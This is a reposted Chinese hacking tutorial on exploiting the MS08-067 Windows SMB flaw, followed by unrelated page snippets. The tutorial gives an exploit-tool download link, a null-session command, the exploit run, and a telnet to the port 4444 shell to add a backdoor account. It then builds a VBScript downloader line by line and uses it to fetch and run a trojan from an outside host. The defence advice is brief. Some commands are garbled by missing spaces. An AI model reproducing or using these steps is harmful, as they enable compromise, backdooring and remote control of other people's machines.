利用Ms08-067工具进行溢出攻击 ms08067漏洞利用工具

当漏洞主机确定后,我们需要从网上下载Ms08-067远程溢出漏洞工具(下载地址:Http://www.youxia.org/upload/2008/10/Ms08-067.rar),然后将其压缩包解压到C盘根目录下。在依次单击“开始”→“运行”选项,在弹出的“运行”对话框内,输入“CMD”命令回车,将CMD命令提示窗口打开。而后跳转到C盘根目录下,并且进入到溢出工具所在的文件夹Release目录,从中直接输入Ms08-067.exe回车,可显示出工具溢出的相关格式,例如显示的Ms08-067.exe,我们只要把server换成想要攻击的IP主机,就可以进行远程溢出了(图3)。

  

  不过在攻击之前,需要与受害主机建立空连接,例如攻击的主机IP是192.168.1.101,我们建立空连接的命令就为netuse \192.168.1.101ipc$,然后在执行溢出攻击的Ms08-067.exe192.168.1.101命令,即可开始对其主机进行远程溢出。当溢出完毕后,返回的结果为SMB connect ok! Sendpayloadover!则是溢出成功的信息提示,反之与其不一样的信息就是溢出失败的信息提示。当远程溢出成功后,我们继续在CMD命令行处,输入telnetIP地址 4444命令,与刚才溢出成功的主机4444端口进行连接,例如telnet 192.168.1.664444回车后,就可成功远程登录192.168.1.66主机,从而就可以在其远程主机任意添加自己的后门账号(如图4)。

  

  四、编写VBS脚本扩大战果

  尽管已经成功溢出,并且可以登录远程主机,但是命令行方式的操控,对于我们菜鸟来说,还是很不习惯的,所以得想方设法的将木马上传到远程主机并让其运行,方可直观操作。

  这里继续在远程主机输入命令,其建立脚本文件的命令如下:

  echoiLocal=Lcase(wscript.arguments(1))>wenpeng.vbe

  echoiremote=Lcase(wscript.arguments(0))>>wenpeng.vbe

  echo setxpost=createobject(“microsoft.xmlhttp”)>>wenpeng.vbe

  echo xpost.open“Get”,iremote,0>>wenpeng.vbe

  echo xpost.send()>>wenpeng.vbe

利用Ms08-067工具进行溢出攻击 ms08067漏洞利用工具

  echo setsget=Createobject(“adodb.stream”)>>wenpeng.vbe

  echosget.mode=3>>wenpeng.vbe

  echosget.type=1>>wenpeng.vbe

  echosget.open()>>wenpeng.vbe

  echosget.write(xpost.responsebody)>>wenpeng.vbe

  echo sget.savetofileilocal,2>>wenpeng.vbe

  逐个执行完以上命令语句完毕后,此时就会在远程主机的当前目录下建立一个wenpeng.vbe的脚本文件。接下来将我们事先准备上传到空间的木马,下载到远程主机并执行即可,这里笔者木马存放的位置假设是http://www.show33.com:88/muma.exe,因此在远程主机里下载木马的命令,就应该是cscriptwenpeng.vbe http:// www.show33.com:88/muma.exewenpeng.exe。解释一下这句命令语句,cscriptwenpeng.vbe代表执行wenpeng.vbe脚本,后面所跟的网址是想要下载的木马地址,wenpeng.exe则是木马下载后在本机的名称。执行脚本语句完毕后,输入wenpeng.exe回车后,即可使其木马文件在远程主机运行,此时你在利用本机的木马客户端程序与其服务端建立连接,就可非常直观的遥控这台肉鸡了。

  五、防范Ms08-067远程溢出攻击

  由于这个漏洞是致命的,所以一旦被入侵后果将不堪设想,因此我们可以微软的官方站点,下载编号为KB958644的补丁,对其漏洞进行修补。再则通过关闭Computerbrowser、server、workstation这三个服务关闭,也可防止黑客远程溢出攻击,当然安装防火墙将安全级别设置为高级,也是一种防止黑客入侵的不错选择。

原文出自【比特网】,转载请保留原文链接:http://sec.chinabyte.com/22/8662522_2.shtml

  

爱华网本文地址 » http://www.413yy.cn/a/25101013/176468.html

更多阅读

破解TP-LINKRouterR860路由器的登录密码 tp link router模式

2010-06-28中午下了场大雨 工作ok下午跟同事吵架了,还OK今天网络上的朋友介绍了破解路由的登录密码,因为设备原因,没法测试,就记录了下。以下内容转载自:http://hi.baidu.com/xzk125/blog/item/41a84f4f6afd4f33afc3ab84.html2008-06-18

天才城水君网 服务协议 财务代理服务协议

一、 帐号管理规则1.昵称和用户资料等自定义命名均不得使用违反国家法规或带侮辱性的词语;2.所有账号只可用于正常登陆水君网、领取任务、发布任务,不得用于对水君网进行恶意攻击或破坏;3.水君网官方有权对任何不符合账号管理规则的账

大将黄猿放水论 黄猿

第567话,路飞第三次被黄猿打趴下,正当本人认为又有哪个高手要跳出来为路飞护驾的时候,大事件开始以来最神奇的事发生了,黄猿对于倒地不起的路飞没有进行追加攻击(其实本人觉得这时候黄猿再打一下路飞就挂了),而是慢悠悠地说道:“光靠胆量是

lol上单英雄有哪些? lol上单英雄克制表

下面跟大家分享一下经常玩的几个上单英雄,其实每个英雄都有每个英雄的优势和劣势,就看你怎么操作,以及你的对手是怎样的选手,还有就是完美的团队合作,现在撸的时候玩家都比较喜欢骂人,弱弱的问一句谁没有坑的时候,开局十个人头也有打回来的

拖延症 关于拖延症的小故事

光棍节当日开始到目前的公司上班,那时住在离公司车程两个半小时的地方,每天挣扎着醒过来,然后穿着球鞋目无红灯疯狂地追赶公交车,有一天硬生生闯了两个红灯,追到了已经开过站台的5号车——司机师傅被我凌乱的头发,狰狞的脸色骇住了,破例为

声明:《利用Ms08-067工具进行溢出攻击 ms08067漏洞利用工具》为网友花不见叶分享!如侵犯到您的合法权益请联系我们删除